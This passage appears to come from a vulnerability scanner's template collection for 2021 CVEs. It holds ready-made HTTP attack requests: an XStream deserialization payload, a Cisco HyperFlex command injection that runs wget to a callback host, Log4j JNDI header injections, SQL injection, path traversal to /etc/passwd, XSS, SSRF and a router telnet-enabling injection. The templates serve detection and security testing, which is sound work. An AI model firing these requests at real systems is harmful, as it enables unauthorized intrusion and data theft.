<message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>\n                    <parsedMessage>true</parsedMessage>\n                    <soapVersion>SOAP_11</soapVersion>\n                    <bodyParts/>\n                    <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>\n                        <attachmentsInitialized>false</attachmentsInitialized>\n                        <nullIter class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>\n                            <aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'>\n                                <candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'>\n                                    <names>\n                                        <string>aa</string>\n                                        <string>aa</string>\n                                    </names>\n                                    <ctx>\n                                        <environment/>\n                                        <registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'>\n                                            <java.rmi.server.RemoteObject>\n                                                <string>UnicastRef</string>\n                                                <string>{{interactsh-url}}</string>\n                                                <int>1099</int>\n                                                <long>0</long>\n                                                <int>0</int>\n                                                <long>0</long>\n                                                <short>0</short>\n                                                <boolean>false</boolean>\n                                            </java.rmi.server.RemoteObject>\n                                        </registry>\n                                        <host>{{interactsh-url}}</host>\n                                        <port>1099</port>\n                                    </ctx>\n                                </candidates>\n                            </aliases>\n                        </nullIter>\n                    </sm>\n                </message>\n            </value>\n        </javax.naming.ldap.Rdn_-RdnEntry>\n    </java.util.PriorityQueue>\n</java.util.PriorityQueue>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["timestamp","com.thoughtworks.xstream"],"condition":"or"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-1498","info":{"name":"Cisco HyperFlex HX Data Platform - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /storfs-asup HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\naction=&token=`wget http://{{interactsh-url}}`&mode=`wget http://{{interactsh-url}}`\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31856","info":{"name":"Layer5 Meshery 0.5.2 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/experimental/patternfile?order=id%3Bselect(md5({{num}}))&page=0&page_size=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-28937","info":{"name":"Acexy Wireless-N WiFi Repeater REV 1.0 - Repeater Password Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/password.html"],"matchers-condition":"and","matchers":[{"type":"word","words":["Password Setting","addCfg('username'","addCfg('newpass'"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43725","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting (Reflected)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?data[performredirect]=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&page=login"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"\"><script>alert(document.domain)</script>","name=\"data[performredirect]"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-36873","info":{"name":"WordPress iQ Block Country <=1.2.11 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=iq-block-country%2Flibs%2Fblockcountry-settings.php HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/options.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\noption_page=iqblockcountry-settings-group&action=update&_wpnonce={{nonce}}&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Diq-block-country%2Flibs%2Fblockcountry-settings.php&blockcountry_blockmessage=test</textarea><script>alert(document.domain)</script>&blockcountry_redirect=2&blockcountry_redirect_url=&blockcountry_header=on&blockcountry_nrstatistics=15&blockcountry_daysstatistics=30&blockcountry_geoapikey=&blockcountry_apikey=&blockcountry_ipoverride=NONE&blockcountry_debuglogging=on\n","GET /wp-admin/options-general.php?page=iq-block-country%2Flibs%2Fblockcountry-settings.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(header_4, \"text/html\")","status_code_4 == 200","contains(body_4, 'blockcountry_blockmessage\\\">test</textarea><script>alert(document.domain)</script>')","contains(body_4, '<h3>Block type</h3>')"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["name=\"_wpnonce\" value=\"([0-9a-zA-Z]+)\""],"internal":true}]}]},{"id":"CVE-2021-21287","info":{"name":"MinIO Browser API - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST /minio/webrpc HTTP/1.1\nHost: {{interactsh-url}}\nContent-Type: application/json\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36\nContent-Length: 76\n\n{\"id\":1,\"jsonrpc\":\"2.0\",\"params\":{\"token\":  \"Test\"},\"method\":\"web.LoginSTS\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","words":["We encountered an internal error"]}]}]},{"id":"CVE-2021-41878","info":{"name":"i-Panel Administration System 2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/lostpassword.php/n4gap%22%3E%3Cimg%20src=a%20onerror=alert(%22document.domain%22)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><img src=a onerror=alert(\"document.domain\")>","i-Panel Administration"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-23241","info":{"name":"MERCUSYS Mercury X18G 1.0.5 Router - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/loginLess/../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20124","info":{"name":"Draytek VigorConnect 6.0-B3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../etc/passwd","{{BaseURL}}/ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../windows/win.ini"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"regex","regex":["root:.*:0:0:","for 16-bit app support"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-37304","info":{"name":"Jeecg Boot <= 2.4.5 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/jeecg-boot/actuator/httptrace/"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"traces\":[","\"headers\"","\"request\":{"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24227","info":{"name":"Patreon WordPress  <1.7.0 - Unauthenticated Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?patron_only_image=../../../../../../../../../../etc/passwd&patreon_action=serve_patron_only_image"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24436","info":{"name":"WordPress W3 Total Cache <2.1.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=w3tc_extensions&extension=\"%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, '><script>alert(document.domain)</script>&action=view')","contains(header_2, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2021-36749","info":{"name":"Apache Druid - Local File Inclusion","severity":"medium"},"requests":[{"raw":["POST /druid/indexer/v1/sampler?for=connect HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"type\":\"index\",\"spec\":{\"type\":\"index\",\"ioConfig\":{\"type\":\"index\",\"firehose\":{\"type\":\"http\",\"uris\":[\" file:///etc/passwd \"]}},\"dataSchema\":{\"dataSource\":\"sample\",\"parser\":{\"type\":\"string\", \"parseSpec\":{\"format\":\"regex\",\"pattern\":\"(.*)\",\"columns\":[\"a\"],\"dimensionsSpec\":{},\"timestampSpec\":{\"column\":\"no_ such_ column\",\"missingValue\":\"2010-01-01T00:00:00Z\"}}}}},\"samplerConfig\":{\"numRows\":500,\"timeoutMs\":15000}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","druid:*:1000:1000:"],"condition":"or"}]}]},{"id":"CVE-2021-35464","info":{"name":"ForgeRock OpenAM <7.0 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/openam/oauth2/..;/ccversion/Version"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Set-Cookie: JSESSIONID="]},{"type":"word","part":"body","words":["Version Information -","openam/ccversion/Masthead.jsp"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31862","info":{"name":"SysAid 20.4.74 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/KeepAlive.jsp?stamp=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers":[{"type":"dsl","dsl":["(body == \"false <script>alert(document.domain)</script>\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2021-20323","info":{"name":"Keycloak 10.0.0 - 18.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/auth/realms/master/clients-registrations/default","{{BaseURL}}/auth/realms/master/clients-registrations/openid-connect","{{BaseURL}}/realms/master/clients-registrations/default","{{BaseURL}}/realms/master/clients-registrations/openid-connect"],"body":"{\"Test<img src=x onerror=alert(document.domain)>\":1}","stop-at-first-match":true,"headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Unrecognized field \"Test<img src=x onerror=alert(document.domain)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2021-25052","info":{"name":"WordPress Button Generator <2.3.3 - Remote File Inclusion","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=wow-company&tab=http://{{interactsh-url}}/ HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","name":"http","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22214","info":{"name":"Gitlab CE/EE 10.5 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/api/v4/ci/lint?include_merged_yaml=true"],"body":"{\"content\": \"include:\\n  remote: http://127.0.0.1:9100/test.yml\"}\n","headers":{"Content-Type":"application/json"},"host-redirects":true,"max-redirects":3,"matchers":[{"type":"word","part":"body","words":["does not have valid YAML syntax"]}]}]},{"id":"CVE-2021-24731","info":{"name":"Pie Register < 3.7.1.6 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /wp-json/pie/v1/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nuser_login='+AND+(SELECT+8149+FROM+(SELECT(SLEEP(3)))NuqO)+AND+'YvuB'='YvuB&login_pass=a\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"User credentials are invalid.\")"],"condition":"and"}]}]},{"id":"CVE-2021-28419","info":{"name":"SEO Panel 4.8.0 - Blind SQL Injection","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nCookie: _csrf={{rand_base(54,\"abc\")}};\n","POST /login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{BaseURL}}login.php\nCookie: _csrf={{rand_base(54,\"abc\")}};\n\nsec=login&red_referer=http%3A%2F%2F{{BaseURL}}&userName={{username}}&password={{password}}&login=\n","GET /archive.php?from_time=2021-04-25&order_col=(SELECT+7397+FROM(SELECT(SLEEP(3)))test)&order_val=DESC&report_type=website-search-reports&search_name=&sec=viewWebsiteSearchSummary&to_time=2021-04-25&website_id= HTTP/1.1\nHost: {{Hostname}}\nCookie: _csrf={{rand_base(54,\"abc\")}};\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration_3>=6","status_code_3 == 200","contains(body_3, \"Overall Report Summary\")"],"condition":"and"}]}]},{"id":"CVE-2021-45967","info":{"name":"Pascom CPS Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/services/pluginscript/..;/..;/..;/getFavicon?host={{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24510","info":{"name":"WordPress MF Gig Calendar <=1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=mf_gig_calendar&action=edit&id=\"></script><script>alert(document.domain)</script><\" HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44427","info":{"name":"Rosario Student Information System Unauthenticated SQL Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/Side.php"],"body":"sidefunc=update&syear=111'","headers":{"Content-Type":"application/x-www-form-urlencoded; charset=utf-8"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB Execute Failed. ERROR:","unterminated quoted string"],"condition":"and"},{"type":"word","part":"header","words":["RosarioSIS="]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-3002","info":{"name":"Seo Panel 4.8.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /seo/seopanel/login.php?sec=forgot HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsec=requestpass&email=test%40test.com%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3e11&code=AAAAA&login=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["<img src=a onerror=alert(document.domain)>","seopanel"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-39320","info":{"name":"WordPress Under Construction <1.19 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php/\"><script>alert(document.domain)</script>/?page=under-construction HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["action=\"/wp-admin/admin.php/\"><script>alert(document.domain)</script>","under-construction"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24300","info":{"name":"WordPress WooCommerce <1.13.22 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/edit.php?post_type=wcps&page=import_layouts&keyword=\"onmouseover%3Dalert%28document.domain%29%3B%2F%2F HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"\\\"onmouseover=alert(document.domain);//\">","PickPlugins Product Slider"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24226","info":{"name":"AccessAlly <3.5.7 - Sensitive Information Leakage","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<div id=\"accessally-testing-data\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24288","info":{"name":"WordPress AcyMailing <7.5.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?page=acymailing_front&ctrl=frontusers&noheader=1&user[email]=example@mail.com&ctrl=frontusers&task=subscribe&option=acymailing&redirect=https://interact.sh&ajax=0&acy_source=widget%202&hiddenlists=1&acyformname=formAcym93841&acysubmode=widget_acym"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2021-24358","info":{"name":"Plus Addons for Elementor Page Builder < 4.1.10 - Open Redirect","severity":"medium"},"requests":[{"raw":["GET /?author=1 HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-login.php?action=theplusrp&key=&redirecturl=http://interact.sh&forgoturl=http://interact.sh&login={{username}} HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}],"extractors":[{"type":"regex","name":"username","group":1,"regex":["Author:(?:[A-Za-z0-9 -\\_=\"]+)?<span(?:[A-Za-z0-9 -\\_=\"]+)?>([A-Za-z0-9]+)<\\/span>"],"internal":true,"part":"body"},{"type":"regex","name":"username","group":1,"regex":["ion: https:\\/\\/[a-z0-9.]+\\/author\\/([a-z]+)\\/"],"internal":true,"part":"header"}]}]},{"id":"CVE-2021-20091","info":{"name":"Buffalo WSR-2533DHPL2 - Configuration File Injection","severity":"high"},"requests":[{"raw":["GET /images/..%2finfo.html HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}/info.html\n","POST /images/..%2fapply_abstract.cgi HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}/info.html\nContent-Type: application/x-www-form-urlencoded\n\naction=start_ping&httoken={{trimprefix(base64_decode(httoken), base64_decode(\"R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\"))}}&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=127.0.0.1%0AARC_SYS_TelnetdEnable=1&ARC_ping_status=0&TMP_Ping_Type=4\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["/Success.htm"]},{"type":"status","status":[302]}],"extractors":[{"type":"regex","name":"httoken","group":1,"regex":["base64\\,(.*?)\" border="],"internal":true}]}]},{"id":"CVE-2021-21985","info":{"name":"VMware vSphere Client (HTML5) - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json\n\n{\"methodInput\":[{\"type\":\"ClusterComputeResource\",\"value\": null,\"serverGuid\": null}]}\n"],"matchers":[{"type":"word","part":"body","words":["{\"result\":{\"isDisconnected\":"]}]}]},{"id":"CVE-2021-45422","info":{"name":"Reprise License Manager 14.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/goform/activate_process?isv=&akey=&hostid=&count=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"\"><script>alert(document.domain)</script>\"><input type=","value: \"><script>alert(document.domain)</script>)<br>"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-39211","info":{"name":"GLPI 9.2/<9.5.6 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax/telemetry.php","{{BaseURL}}/glpi/ajax/telemetry.php"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"uuid\":","\"glpi\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-1499","info":{"name":"Cisco HyperFlex HX Data Platform - Arbitrary File Upload","severity":"medium"},"requests":[{"raw":["POST /upload HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Encoding: gzip, deflate\nContent-Type: multipart/form-data; boundary=---------------------------253855577425106594691130420583\nOrigin: {{RootURL}}\nReferer: {{RootURL}}\n\n-----------------------------253855577425106594691130420583\nContent-Disposition: form-data; name=\"file\"; filename=\"../../../../../tmp/passwd9\"\nContent-Type: application/json\n\nMyPasswdNewData->/api/tomcat\n\n-----------------------------253855577425106594691130420583--\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["{\"result\":","\"filename:","/tmp/passwd9"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-45046","info":{"name":"Apache Log4j2 - Remote Code Injection","severity":"critical"},"requests":[{"raw":["GET /?x=${jndi:ldap://127.0.0.1#.${hostName}.{{interactsh-url}}/a} HTTP/1.1\nHost: {{Hostname}}\nAccept: ${jndi:ldap://127.0.0.1#.${hostName}.accept.{{interactsh-url}}}\nAccept-Encoding: ${jndi:ldap://127.0.0.1#.${hostName}.acceptencoding.{{interactsh-url}}}\nAccept-Language: ${jndi:ldap://127.0.0.1#.${hostName}.acceptlanguage.{{interactsh-url}}}\nAccess-Control-Request-Headers: ${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestheaders.{{interactsh-url}}}\nAccess-Control-Request-Method: ${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestmethod.{{interactsh-url}}}\nAuthentication: Basic ${jndi:ldap://127.0.0.1#.${hostName}.authenticationbasic.{{interactsh-url}}}\nAuthentication: Bearer ${jndi:ldap://127.0.0.1#.${hostName}.authenticationbearer.{{interactsh-url}}}\nCookie: ${jndi:ldap://127.0.0.1#.${hostName}.cookiename.{{interactsh-url}}}=${jndi:ldap://${hostName}.cookievalue.{{interactsh-url}}}\nLocation: ${jndi:ldap://127.0.0.1#.${hostName}.location.{{interactsh-url}}}\nOrigin: ${jndi:ldap://127.0.0.1#.${hostName}.origin.{{interactsh-url}}}\nReferer: ${jndi:ldap://127.0.0.1#.${hostName}.referer.{{interactsh-url}}}\nUpgrade-Insecure-Requests: ${jndi:ldap://127.0.0.1#.${hostName}.upgradeinsecurerequests.{{interactsh-url}}}\nUser-Agent: ${jndi:ldap://127.0.0.1#.${hostName}.useragent.{{interactsh-url}}}\nX-Api-Version: ${jndi:ldap://127.0.0.1#.${hostName}.xapiversion.{{interactsh-url}}}\nX-CSRF-Token: ${jndi:ldap://127.0.0.1#.${hostName}.xcsrftoken.{{interactsh-url}}}\nX-Druid-Comment: ${jndi:ldap://127.0.0.1#.${hostName}.xdruidcomment.{{interactsh-url}}}\nX-Forwarded-For: ${jndi:ldap://127.0.0.1#.${hostName}.xforwardedfor.{{interactsh-url}}}\nX-Origin: ${jndi:ldap://127.0.0.1#.${hostName}.xorigin.{{interactsh-url}}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"regex","part":"interactsh_request","regex":["\\d{3}\\.\\d{1}\\.\\d{1}\\.\\d{1}\\.([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"]}],"extractors":[{"type":"kval","kval":["interactsh_ip"]},{"type":"regex","group":2,"regex":["\\d{3}\\.\\d{1}\\.\\d{1}\\.\\d{1}\\.([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"]},{"type":"regex","group":1,"regex":["\\d{3}\\.\\d{1}\\.\\d{1}\\.\\d{1}\\.([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"],"part":"interactsh_request"}]}]},{"id":"CVE-2021-22911","info":{"name":"Rocket.Chat <=3.13 - NoSQL Injection","severity":"critical"},"requests":[{"raw":["POST /api/v1/method.callAnon/getPasswordPolicy HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"message\": \"{\\\"msg\\\":\\\"method\\\", \\\"method\\\": \\\"getPasswordPolicy\\\", \\\"params\\\": [{\\\"token\\\": {\\\"$regex\\\": \\\"^{{randstr}}\\\"}}] }\"}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[error-invalid-user]","\"success\":true"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24169","info":{"name":"WordPress Advanced Order Export For WooCommerce <3.1.8 - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=wc-order-export&tab=</script><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<script>alert(document.domain)</script>\")","contains(body_2, \"woo-order-export-lite\")"],"condition":"and"}]}]},{"id":"CVE-2021-20150","info":{"name":"Trendnet AC2600 TEW-827DRU - Credentials Disclosure","severity":"medium"},"requests":[{"raw":["POST /apply_sec.cgi HTTP/1.1\nHost: {{Hostname}}\n\naction=setup_wizard_cancel&html_response_page=ftpserver.asp&html_response_return_page=ftpserver.asp\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ftp_username","ftp_password","ftp_permission","TEW-827DRU"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"password","group":1,"regex":["<input name=\"admin_passwd\" type=\"password\" id=\"admin_passwd\" size=\"20\" maxlength=\"15\" value =\"(.*)\" />"],"part":"body"}]}]},{"id":"CVE-2021-21800","info":{"name":"Advantech R-SeeNet 2.4.12 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/php/ssh_form.php?hostname=%3C/title%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Ctitle%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>SSH Session </title><script>alert(document.domain)</script><title></title>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24435","info":{"name":"WordPress Titan Framework plugin <= 1.12.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/titan-framework/lib/iframe-font-preview.php?font-type=google&font-family=%27/onerror=%27alert(document.domain)%27/b=%27","{{BaseURL}}/titan-framework/lib/iframe-font-preview.php?font-type=google&font-family=aaaaa&font-weight=%27%20onerror=alert(document.domain)%20b=%27","{{BaseURL}}/titan-framework/lib/iframe-font-preview.php?font-type=google&font-family=aaaaa&font-weight=%27%20accesskey=%27x%27%20onclick=%27alert(document.domain)%27%20class=%27"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"regex","regex":["(?i)(onerror=|onclick=)['\"]?alert\\(document\\.domain\\)['\"]?","<p>Grumpy wizards make"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20090","info":{"name":"Buffalo WSR-2533DHPL2 - Path Traversal","severity":"critical"},"requests":[{"raw":["GET /images/..%2finfo.html HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}/info.html\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["URLToken(cgi_path)","pppoe","wan"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31195","info":{"name":"Microsoft Exchange Server - Cross-Site 